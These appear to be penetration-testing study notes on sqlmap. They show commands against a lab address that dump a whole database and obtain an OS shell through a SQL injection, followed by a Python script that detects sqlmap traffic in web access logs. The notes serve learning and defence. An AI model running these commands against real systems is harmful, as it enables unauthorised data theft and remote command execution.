SQLmap [Not Allowed in OSCP]
Although sqlmap is a great tool for automating SQLi attacks, it provides next-to-zero stealth. Because of the high volume of traffic it generates, sqlmap should not be a first-choice tool during assignments that require staying under the radar.
We scan the URL with -u and specify the parameter to test using -p:
sqlmap -u "http://192.168.50.19/blindsqli.php?user=1" -p user
After confirming that it is vulnerable to SQLi, we can also dump the entire database using --dump:
sqlmap -u "http://192.168.50.19/blindsqli.php?user=1" -p user --dump
Way of getting OS Shell
Capture and save the packet first (right-click and select copy to file):
sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
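The traffic volume noted at the top of this page is what defenders key on. As an added example (not part of the original notes), this Python script flags sources in a web access log by sqlmap's default User-Agent and, since that header is client-controlled, by the number of distinct values sent to a single parameter; the log lines, source IPs and the `min_variants` threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
SQLMAP_UA = "sqlmap/1.7#stable (https://sqlmap.org)"  # shape of sqlmap's default UA

def _line(ip, value, ua):
    """Build one constructed access-log line in 'combined' format."""
    return (f'{ip} - - [10/Mar/2024:10:00:01 +0000] "GET /blindsqli.php?user={value} '
            f'HTTP/1.1" 200 512 "-" "{ua}"')

# Constructed sample traffic (not real logs): .7 keeps the default UA,
# .8 changed its UA but still hammers one parameter, .9 is a normal user.
PROBES = ["1", "1%27", "1%20AND%201%3D1", "1%20AND%201%3D2", "1%29", "1%22"]
SAMPLE_LOG = "\n".join(
    [_line("192.168.50.7", v, SQLMAP_UA) for v in PROBES[:2]]
    + [_line("192.168.50.8", v, BROWSER_UA) for v in PROBES]
    + [_line("192.168.50.9", v, BROWSER_UA) for v in ("1", "2")]
)

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def detect(log_text, min_variants=5):
    """Return {ip: set(reasons)} for sources that look like automated SQLi testing."""
    reasons = defaultdict(set)
    variants = defaultdict(set)  # (ip, path, param) -> distinct decoded values
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip = m["ip"]
        if m["ua"].lower().startswith("sqlmap/"):
            reasons[ip].add("default sqlmap User-Agent")
        parts = urlsplit(m["url"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            variants[(ip, parts.path, name)].add(value)
    for (ip, path, name), values in variants.items():
        if len(values) >= min_variants:
            reasons[ip].add(f"{len(values)} distinct values for {path}?{name}")
    return dict(reasons)

if __name__ == "__main__":
    for ip, why in sorted(detect(SAMPLE_LOG).items()):
        print(ip, "->", "; ".join(sorted(why)))
```

In production the distinct-value count would be taken over a time window and tuned per endpoint; POST bodies, as used with `-r`, need application or WAF logging because access logs do not record them.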